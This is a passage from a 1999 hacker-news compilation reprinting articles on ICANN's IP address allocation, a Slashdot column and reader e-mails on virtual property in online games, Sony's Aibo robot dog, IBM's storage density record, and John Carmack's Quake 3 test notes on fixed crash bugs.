proposed a model that establishes an address supporting organization (ASO), containing
stakeholders who will forge new policies concerning IP numbering.
At its Berlin meeting May 26, ICANN will vote on proposed bylaws for supporting organizations,
including the ASO. The bylaws will set up an open membership consisting of IP address registries,
ISPs, and end users. For a new policy to be enacted a majority of each membership category must
approve it.
Election of the new organization comes at a critical juncture in the evolution of the Net's address
system, experts say, and is almost certain to stoke the public scrutiny surrounding ICANN.
"It's important that [the ASO] understand the technical issues involved and are not swayed by the
political expediencies that have been pressed in the past," said David Conrad, founder of the Asia
Pacific Network Information Center (APNIC), one of the three IP address registries.
This sentiment is echoed by ISPs, another faction whose input will be vital to the ASO.
"How this policy recommendation body is formed within ICANN is a concern," said Barbara Dooley,
president of ISP trade group the Commercial Internet Exchange.
Numbers don't add up
Not surprisingly, today's system is a far cry from the way things were done in the early days of the
Net.
Thirty years ago few architects of what was then called the Arpanet expected it to mushroom into a
medium that would change the way people live, work, and do business. IP addresses were viewed as an
endless resource that was free for the taking. Out of that thinking came the practice of doling out
wastefully large blocks of numbers to companies or groups that asked for them.
Ford Motor, Eli Lilly, and Hewlett-Packard are just three of the holders of the largest "legacy"
blocks, known as Class A allocations, which contain more than 16.7 million addresses each. In 1995,
leading cable Net access provider @Home appealed to the Internet Assigned Numbers Authority after its
application for a Class A allocation was turned down. @Home ended up getting numerous smaller Class B
allocations, creating some controversy among local registries.
The legacy space doled out to those that had the foresight to ask for it is the source of jealousy for
many latecomers. They point out that while Mercedes Benz holds nearly 17 million addresses, only 1.04
million have been allocated to the entire nation of China.
"There are a number of different business issues we foresee in the future that will require IP
addressing," said Bill Hurley, manager of new media and relationship marketing for Mercedes Benz.
"We are looking to have an IP address for every car."
ICANN no doubt will be pressured to tip the scales toward those who have IP envy.
"Some people in Africa and South America want their own regional registries. Some of the ISPs want to
have a bigger role in how the allocation is done," acknowledged Commerce Department spokeswoman Becky Burr,
who is overseeing the agreement with ICANN.
"There may be a more complicated mix of players," she added. "But it still will be a fairly straightforward
allocation system."
Despite pessimism about shortages in IP space and the politics of allocation, some legacy holders have
voluntarily surrendered their blocks for the good of the Net community, such as the Defense Department and
BBN, now owned by GTE. Stanford University also is in negotiations to return part of its huge block, according
to school and registry officials.
@HWA
37.1 And is webspace infinate?
~~~~~~~~~~~~~~~~~~~~~~~~~
Infinite Space
From http://www.slashdot.org/
Posted by JonKatz on Thursday May 13, @10:00AM EDT
from the Virtual-Property-(cont.) dept.
Physicists, gamers, Web designers and developers and engineers took up (with a vengeance) the question
of whether or not the Net and the Web was an Infinite Space, forever expansible. Most felt that while
Web Space was infinite, desirable property isn't. Also comments about crackers, cryptography, gaming, virtual property,
the future of the Net and the Web, and concerns about whether real world property laws apply online. All in all, a great
cyber gab-fest, pro and con.
E-mail poured in all weekend about Infinite Space -- whether or not space on the Net and Web is forever expansible.
This was an offshoot of columns and discussions here last week about whether new connective technologies like eBay
combined with the millions of middle-class Americans pouring onto the Web were escalating the concept of virtual
property, already a custom on some gaming sites.
On the subject of Infinite Space, I heard from physicists, academics, engineers, gamers, computer execs, developers
and designers � some very brainy geeks who offered smart and diverging theories.
While a majority of e-mailers thought virtual property was a big idea whose time had come, there were also skeptics
claiming this idea wasn�t really anything new.
In one sense, they�re right. Gamers have been trading virtual parts, symbols and characters for awhile. But the impact
of new technology is often felt when new and middle-class users mainstream it, not when pioneers invent it.
Linux isn't new either, but that doesn't mean nobody should write or talk about it. As open source reaches critical mass,
it becomes significant. Same with other technologies from the phone to modems to computers themselves. Hackers
were patching together BBS�s from the earliest days of networked computing, but it wasn�t until many more people,
from housewives to business owners started pouring online that the Net took off. As more and more people -- most
armed with credit cards and checkbooks -- continue to explore and use the Net and the Web, expect continuous and
unimaginable change. But most of you know that.
Note: Lots of people wrote asking if I was changing my column format to include more of my e-mail responses. Yes, I
am. An interactive column should, when possible, include more voices than one. Not only do I get sick of myself, but I
get especially weary of getting so much smart and thoughtful e-mail nobody but me ever sees, while the often highly
testicular public posts on Threads are visible to everybody. Many visitors, lurkers and readers confuse Threads with
reality. It is one reality, but not the only one.
People have a perfect right to flame, but as my e-mail (and every other Slashdot writer and author demonstrates daily)
smart lurkers constitute the vast, unseen majority of Slashdot readers. They also want to be seen and heard.
So here are just a few of the posts � pro and con -- responding to my columns about virtual property and my questions
about whether space on the Net is an Infinite Space:
Boredom is More Significant, from: Stephane Lajoie
"Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested?
If you abstract away things like bandwidth and hard-drive storage (which seem to grow fast enough anyway), the
answer to the first question is yes: the net is infinite. But you seem to imply that the second question is the same as the
first, which it isn't.
Crowdedness happens in a specific physical place. We can say that New York City is crowded, while Arkansas is
close to empty. If we extend this concept to the net, you can say that slashdot.org is crowded while kgjrhegh.com is
empty (the DN isn't even registered, anybody could move in there for free; not anybody could move in to
Microsoft.com though).
The same thing happens in physical space: if you abstract away things like the currently limited means of transportation,
you can come to the conclusion that living space for humans in the universe is infinite. But just like people go to
slashdot.org and not to kgjrhegh.com, you won't see people moving to Mars en masse even if affordable transportation
becomes available: there just isn't anything fun to do there. I think it is Linus Torvalds who said that in a few decades,
the primary motivation for people to do "anything" will be fear of boredom.
The limit here isn't free domain names or available land in an online game. It's the attention span of people. People buy
powerful characters in UO to get attention from other players. Once the game become dated and people start moving
to Everquest, Asheron's Call or others, these characters will loose all their value because there won't be anybody to
show them off to.
You can't open a 20 screens megaplex in Nowhere, Arkansas. You can't sell web adds at kgjrhegh.com. Hope I could
keep your attention for that long :).
PS: The Cyber-Movers example was kinda weak. I mean, it's a bunch of engineers copying files around and setting up
domain name servers. Hardly the signs of a revolution if you ask me :). Still, very interesting subject matter.
PPS: I like this format of writing series of articles instead of moving on to a new subject for each article.
St�phane Lajoie / Ludus Design
Nanotechnology and other answers, from Rob Jellinghaus:
"Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested?"
This question is familiar in another domain: nanotechnology. The general form of the question is, "Given sufficient
technological development, are resources potentially inexhaustible? And if so, what happens to the economy?"
In general, it is scarcity that creates value. In a world where there are infinite amounts of everything, there is no reason
for everything not to be free. But when there is only so much of something, then competition arises for that scarce
resource, and suddenly you need a way to determine who needs/wants/deserves it most. Presto: economics.
Ultima Online could probably, in principle, expand their cyberverse to accomodate the influx of people craving land. But
it's not clear that they should. The scarcity of land there is greatly increasing the value of each individual property,
perhaps intensifying the fervor of their citizens, and certainly buying them advertising that they couldn't buy with their
own money (your article being a great example). In other words, by keeping their virtual real estate scarce, they are
more effectively competing for the attention of the world's gamers, by making it clear just how valuable that real estate
is.
In fact, UO (Ultima Online)perfectly exemplifies the two resources that are _not_infinite, and will never be: Human
attention, as all domain name squatters know, is finite. There are only so many eyeballs, and only so many hours in a
day that those eyeballs can be looking at your little corner of the cyberverse. UO is competing with Everquest (which is
coming up fast). Catchy domain names ("slashdot.org") for instance, will always be more valuable than clunky ones
("www.mybiglongcompanyname.net").
- Computing and, especially, network resources are getting exponentially cheaper, but as exponentially more people go
online, it remains fairly costly to serve large audiences. UO definitely incurs ongoing costs in hardware, network
maintenance, and operations management, to keep its servers running; if they were to expand their universe infinitely,
their costs would also expand infinitely. Later.
Anyway, thanks for the thought-provoking questions,
Liberating the Lurkers, from Dana Ryder, IMMSystems:
"Congrats on the new format, if that�s what it is. You are liberating the Lurkers! Posting comments like you are is the
only way some of us can get our ideas out and hear the good ideas of others. The rule on Slashdot Threads seems to be
that the dumber one is, the quicker you are to claim you�re smarter than everybody else, or that you already knew
everything everybody else is saying. I can�t fault anybody for being stupid, but boy, are these people proud of it!
Slashdot�s columns on Virtual Property were talked about all day at my company � keep ?em coming!"
Of Course Not, from: Randall L Joiner:
"To your question about Infinite Space
There are several answers: Of course not, physical (hardware) resources are limited by definition, and thus, eventually
will run out. Within reason, yes, it's infinite, as tech grows, space keeps getting cheaper, there will always be room of
some sort.
The question really is, is valuable web property infinite? Many people have already answered that, and from the skim I
did, most seem to think no. I have to disagree to an extent. Since games and sites only seem to hold interest for short
time periods (game attention spans often measure in hours of game play), and people are constantly searching for the
next game, I would guess that the interest of the gamers will constantly be going through these stages:
1. New game hits, is relatively unknown.
2. Some gamers become regulars, game grows to a small number of players.
3. Game catches on in the main stream, many people start playing.
4. The original players start tiring of it, (for various reasons) and sell out.
5. Older players go back to stage 1 with some other new game. I think we'll start seeing stage 5 in about 6 months to a
year with Ultima. I give Diablo as an example... Few still play it, because everyone's jumped to Ultima. The new
up-and coming is EverQuest. It's part of the game cycle, only now we have the middle-class coming in throwing money
around. I want to know what's going to happen when the mass evac happens for the next great game, and the fools are
stuck with character's they've spent loads of $ on, and are now not worth anything, and no one is around to play the
game with? Even the "rich" couldn't keep up for to long, constantly buying new characters for each new game.
Another problem I don't think you've thought of... What happens if there's a network down time? What happens
if/when a hard-drive crashes and wipes out any record of you having owned the property?
If I were the company running the hardware those games are running on, I'd make damn sure I had a clause stating
they aren't responsible for lost characters/property/etc...
Another problem. What happens when (not _if_) someone hacks a game and suddenly goes nuts with it? How about
Virtual Theft? If I cracked the game, steal your house that you just paid 100,000 for, what recourse do you have? Then
there's the difficulty with calling it property... We have a bung-hole load of property laws in the states, but do any of
them apply to cyberspace? How about in a game where killing and taking property is a legal action? If I kill your
character and taken the property you just bought, do you have any legal recourse in RL? No, I really don't consider that
a silly problem either, as I've read some of the things people have gone to court over (and won!) that are much much
more silly. Altogether, I'm just completely amused by the concept, and consider this just one more proof that most
people really don't understand what the world or the net is really about."
Please! Absolutely Nothing New Here, from: thom stuart (painfully):
Much as it pains me every single time I realize it, I'm afraid that I have to report that once again you're picking value
out of vapor and getting all excited about something that, as always, isn't exciting or new at all.
I'm tempted to launch into an extensive diatribe, but i've got work to do today. Suffice it to say that the "virtual property"
that's got you so frantic in the last couple days is nothing more than a sale of service.
It's amazing that you're managing to misunderstand this to the extent where you think there's something new. Every
month i buy a package of 'minutes' for my mobile phone from my wireless company. These are just numbers in a
computer, of course - am I purchasing "virtual property" here? And, if i am, haven't people been doing that for years?
I could subscribe to a paying-members-only web site; I could choose to pay for HBO; I could buy an Ultima Online
account or good domain name from ebay. These are all the same thing - I'm buying the right to use a service. Just
because I�m not getting a physical product in return doesn't make it magic or 'cyber' or anything else you might want to
think.
Okay, the UO accounts and domain names might have certain 'added value' in terms of the time/effort invested in
bringing them to their current status, but that doesn't make it any different. by buying an account or a domain, the
purchaser is simply entitled to access to certain kinds of service in return for their cold hard cash - but hey, who pays in
"physical cash" these days, anyway?
Ooh! ooh! virtual property paid for with "virtual money"! another monumental technological discovery from jon katz!
better write another /.column about this! please.
Crackers, Gaming and Infinite Space (anonymous):
Here's a copy of the comment I just posted... thought you might like it...BTW great set of articles, and I find your style
to finally have settled out into something that doesn't seem megalomaniacal and much more suited to the world you've
stepped into.. I've liked about 75% of your articles, those I didn't like were some of the earlier ones:
It's bad enough that hackers are being berated by main stream media for supposedly "stealing" from large, anonymous
corporations, can we all see what will happen when the middle class has a vested interest in computer security?
What were to happen if a cracker got onto one of the Ultima online servers, helped himself to some UO Cash and then
bought himself whatever he needs? Worse yet: Cracker gets onto the server, figures out some of it's data structure, and
decides to get into another player's building and cleans him out?
Crackers/malitious hackers finally have something that has value to steal and they would be stealing from mainstream
america instead of the corps.
This can have several consequences as I see it:
First and formost: The biggest hacker backlash in history. You think the Kevin Mitnick case was bad... now the law
enforcement officials no longer have to work on the "estimated losses" reported by companies when they get
documents copied off their servers (say source code), they have real world price tags on what the damages were.
Moreover, can we really trust mainstream american media to see the difference between hackers and crackers? It's
bad enough that they can't do it now when the crackers are just defacing websites.
Secondly: With a bit of luck, this will drive all aspects of computer security forward. I can see dedicated players paying
godo dollars for crypto systems that would protect their online assets. As well, Internationalization of crypto technology
will be given a big boost as non-North american players will want access to the same quality of crypto as we are
privileged to have.
Thirdly: Goverment regulation will quickly be pushed onto the scene. Any location generating real US$ seems to
become the target of the US house and senate.
Third, B: TAXATION! As is, it's very difficult to keep the internet taxes at bay.
In the states, the problem seems to stem from the separation of states.. but if people start shelling out cash for virtual
property, the likes of which cannot be seen right now, there will be a renewed effort by the USG to tax online
transactions.
Fourth: Hopefully this will lead to the apparition of "free" servers that will pop up and have much more room to grow,
allowing people to settle in. It'd be even nicer if a "Homesteading" act were to be implemented on UO (specific
example) to move over onto the new systems, giving them some sort of bonuses (very much like the development of the
"Wild West in early America.)
From Craig Wright: Interesting, But Shame On You!
Virtual Property is an interesting issue but really is nothing new. Buying "space" from a isp for a large website has been
around for years, paying someone else to build the website is comonplace, digitizing a photograph, and how about
DOMAIN NAMES? - these are all forms of virtual property. Middle class americans have been paying cash for
ownership of virtual materials for some time now.
Focusing on some geeks who spend too much on UO characters on ebay and then implying from that fact the economy
is undergoing a fundamental change is really quite silly. Put your technophile cheerleader pom poms down and do a little
research willyah?
Within the online gaming comunity there are other useful examples of virtual property such as Chron-X, Sanctum and
other budding online games working on a far different paradigm than the "service" model of the "pay-as-you-play"
games such as UO. C-X and Sanctum are wholly or partially based around the collectable card game paradigm
introduced years ago by MAGIC: THE GATHERING.
The interesting thing about the online versions (which have been around for at least three years or so) is that they are
ENTIRELY virtual property.
Unlike UO-type games where you have to buy the software and pay an ongoing service fee to keep playing. In these
other games the only thing that one pays for is the virtual cards (software free, no fees except paying for more cards
should you want them). As one might expect, trading, auctioning, and selling collections has been an integral part in the
development of these games. I believe C-X at one time had over 70k accounts and may have plenty more now that
they have moved to a Sony gaming site (I haven't played for nearly a year).
As a matter of fact Genetic Anomalies, the company behind Chron-X, began as a company devising a method for
protecting virtual property and developed with what they call Collectible Bits (back in 1996 I believe) and designed their
the game primarily as a way to illustrate what their software product could do in terms of reducing stealing and hacking
problems already the cause of so many problems in various online gaming communities. UO tangent: it is neither the
first, best nor probably even the largest of its genre. The 150k players - that's BS, online games inflate their players by
counting ACCOUNTS rather than active players, many players play for a while and then either reduce their playing
time significantly or stop playing altogether - but their ACCOUNTS are still counted. This is especially problematic with
UO as there are a half dozen or so games all currently in stiff competition for the same audience.
By the way, UO is the only one of its genre in which its participants have attempted to bring a class action suit against
the company because of their dissatisfaction with the game. The whole genre is unlikely to become a dominant faction
within the online gaming community merely because it is so damn expensive to play. There have been dozens of
experiments for specific subscription games or subscription gaming sites of several varieties and none have achieved
more than moderate success.
I read a few of the /. comments on your first piece and ran across thoughful responses that disagreed with you which
also made interesting points -- yet in your article you quote a few imbicilic flames as representative of those who
disagree and more thoughtful responses of those who agree. This is a rather cheap way to make your argument appear
stronger - shame on you! (Note: I only quote from e-mail, since thoughtful (and non-thoughtful) disagreements are
posted openly on Threads. And I didn�t get many disagreements last week. I always reflect an accurate balance of
criticism versus agreement � discussions where everybody agrees are sort of pointless, and, on the Net, impossible. As
for nasty flames, they never bother me a bit � kind of like mosquitoes or peas off a tank. Knowledgeable or thoughtful
criticism, on the other hand, terrifies me).
@HWA
38.0 Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sony's robotic dog: cute, but not cuddly
By Stephanie Miles
Staff Writer, CNET News.com
May 11, 1999, 1:05 p.m. PT
URL: http://www.news.com/News/Item/0,4,36375,00.html
update Could Sony's new Aibo be a robotic--and canine--version of a Trojan horse, this time used to smuggle
the electronic giant's new technology into homes around the world?
Probably not, analysts say, but Aibo will bring robotics into the home, along with other new Sony technologies.
Announced today, Aibo is an electronic pet capable of acting in response to external stimuli and communicating
with its owner. Intended for entertainment purposes only, the introduction of the robotic dog contains shades
of the company's previous entertainment product, the PlayStation. Once introduced as a pure gaming platform,
the PlayStation now includes computing components such as DVD drives and Internet access.
The introduction of the electronic pet is probably not a subversive method of ingratiating Sony technology
into the American home, especially because Aibo is only projected to sell 2,000 units in the United States next
year, according to Sean Kaldor, an analyst with International Data Corporation.
"I don't think this is their vehicle to propagate technologies into the mass user scale," Kaldor said, noting
that Aibo can only perform very limited functions and can't even fetch yet. Plus, he noted, the toy is priced
around $2,000, which will probably discourage mainstream acceptance. "This isn't a stealth way to mass-introduce
a product."
But Aibo may be some Americans' first opportunity to play with Sony's Memory Stick, a portable, re-recordable
storage media 1.5 inches long with the thickness of a piece of gum. Sony is selling an 8MB Memory Stick accessory
that can store commands for Aibo.
Aibo is also one of the first devices shipping running on Sony's Aperios real-time embedded operating system.
Sony struck a deal with General Instrument last year, licensing the operating system for use in GI's set-top boxes.
"There's a lot of operating systems out there, and this is Sony's proprietary operating system," explained Seamus
McAteer, an analyst with Jupiter Communications, expressing doubts that Sony is attempting any significant attempt
at marketing or promoting Aperios through Aibo.
"You're not going to have a ton of developers developing a lot of applications to run on this device, so it doesn't
buy you a whole lot," he said. "Whoever's going to buy this really doesn't care which real-time OS it is using.
It's a design win, but not a big deal."
Americans are not likely to shell out $2,000 for a programmable dog that does not yet fetch, but Aibo is likely to
succeed in the Japanese market, which wholeheartedly
embraced the Tamagotchi electronic toys, Kaldor said.
"The Japanese perspective on technology is warm and fuzzy," he said. "Robots in Japan are seen as very compelling
things, unlike in the U.S., where they seem cold and harsh."
@HWA
39.0 IBM Breaks more records for higher density storage in hard disk units
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wednesday May 12 4:02 AM ET
IBM Researchers Claim New Data Storage Record
SAN JOSE, Calif. (Reuters) - International Business Machines Corp. (NYSE:IBM - news) said it plans to announce
Wednesday that its researchers have set a new world record for high density data storage.
The company said it has doubled its old record by packing data so tight that 20.3 billion bits can fit in a
square inch of data storage -- pushing up against what many analysts believe to be the physical limits of such
technology.
At the new level of density, every square inch of disk space could hold 2.5 billion bytes -- equivalent to two
TV-quality movies or the text of some 2,500 average-sized novels. Eight bits equal a byte. A byte can store about
one character of text.
The new disk drives are 3.5 times more dense than IBM's highest capacity product, a disk drive for portable
computers capable of storing nearly 6 billion bits per inch of data.
The new developments have been demonstrated only in IBM's research labs, the company noted.
It could take two to three years before IBM is ready to incorporate the technology into commercial products from
IBM, or in disk drives that IBM's technology manufacturing unit increasingly builds for other computer makers, it
said.
``This laboratory demonstration is very good news for our customers and the data storage industry,'' said Robert
Scranton, director of recording head technology at IBM's Almaden Research Center.
``It shows that disk-drive capacities will continue to increase well into the 21st Century,'' he said.
The greater storage capacity could be used to boost the capabilities of portable electronics that use IBM's tiny
1-inch microdrive data storage disks or laptops using its 2.5-inch drives, the company said.
The extra capacity can be used to store recorded music or data-intensive graphics or video that would be impractical
using current technology.
In addition, large corporations could use such ultra-high-capacity drives to store far more data in storage systems
using the same floor space.
``The stability of the bits was especially encouraging,'' Scranton added, referring to possible fluctuations in
storage media used in such systems when pushed to such extremes.
``To make smaller bits, we improve both the disk materials and the read-write components to ensure that the bits'
magnetic orientations will not change by themselves, yet the user can still quickly and reliably erase and rewrite
bits,'' he said.
IBM, which is headquartered in Armonk, N.Y., invented computer hard disk technology in the 1950s and continues to
be a leader in advancing the storage capacity of computers.
The first technical details of the new storage system will be disclosed next week at the International Magnetics
Conference (Intermag 99) in Kyongju, Korea.
@HWA
40.0 Carmack offers a bounty on Quake server DoS's and bug reports
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
F I N G E R
This finger is being tracked and served by The Stomping Grounds' Finger Tracker. If you are looking for more fingers, please visit Stomped or go
directly to the Stomped Finger Tracker.
[idsoftware.com]
Name: John Carmack
Email: johnc@idsoftware.com
Description: Programmer
Project: Quake 3 Arena
-------------------------------------------------------------------------------
5/11/99
-------
You can bias the level of detail lower than allowed in the
menu with "r_lodbias 2", which will force all models to the lowest
lod. The view weapon will look very ugly.
Another little speedup option that isn't offered in the menus is:
"cg_simpleitems 1" this removes the extra rings and spheres around
some items.
You can also turn off all the gibs with "cg_gibs 0".
* clear game memory at init, which fixes the stuck-at-intermission
problem on mac servers
* fixed mismatched free / Z_Free in demo menu
* removed unused reference to sprites/plama.md3
* automatically get sounds from model name
* scale sensitivity by zoom
* immediately archive changes to latched cvars
* cheat protect r_portalonly
* don't print "XXX connected" on level restarts
* fixed "give item" on levels where 0,0,0 is in solid
* fixed timedemo
* don't play pain falling sound if dead
* fixed falling damage sound not snd specific
* fixed crashtest 2
* fixed crashtest 1
* q3map_backshader
* q3map_globaltexture
5/11/99
-------
Do NOT send bug reports and game comments directly to me!
If I have to filter through hundreds of emails a day, I won't get any
more work done... Only crashtest related problems should come to me,
everything else should go to q3feedback@idsoftware.com.
5/11/99
-------
Sami Tammilehto wins the second prize. Some large connectionless packets
can cause crashes.
This one was a result of me having the maximum token size defined lower
than the maximum string size.
5/11/99
-------
BigImp wins the first prize. It doesn't crash the server, but fmtspec
names will crash all clients that try to log on. Technically that would
be an upkeep required DOS attack, but I'll let this one go.
I even had a "FIXME: make vsprintf safe" comment by the offending line...
I am going to update the server to filter out all % chars that come in
over the net to prevent any other similar things.
5/11/99
-------
Everyone should realize that many popular net links are going to be clogged
up with q3test downloads for a while, so net play may be a bit patchy to
a lot of servers.
-------------
Now that the first win32 test is out, here is The Plan for going forward:
All future releases should be same-day for all architectures.
There may be an exe-only update to the current distributions if there are
significant problems, but it isn't scheduled.
The next major test release will include a new one on one map designed for
tournement play, and new executables with server and game modifications, but
will not require downloading a new pak0.pk3.
The release after that will introduce various teamplay rules on the original
two maps. This version will likely be another full download, because I
know that I still have a couple things to change in the map format. This
will probably be the first test running with the virtual machine.
The final major test release will introduce the single player game with
bots and ranks.
After any bugs are shaken out of that, it will be the "Q3 Demo" instead of
the "Q3 Test", and we should be ready to release the full game to stores.
In an ideal world, people that aren't prepared to deal with in-development
software would wait until then to form an opinion of the product.
---------------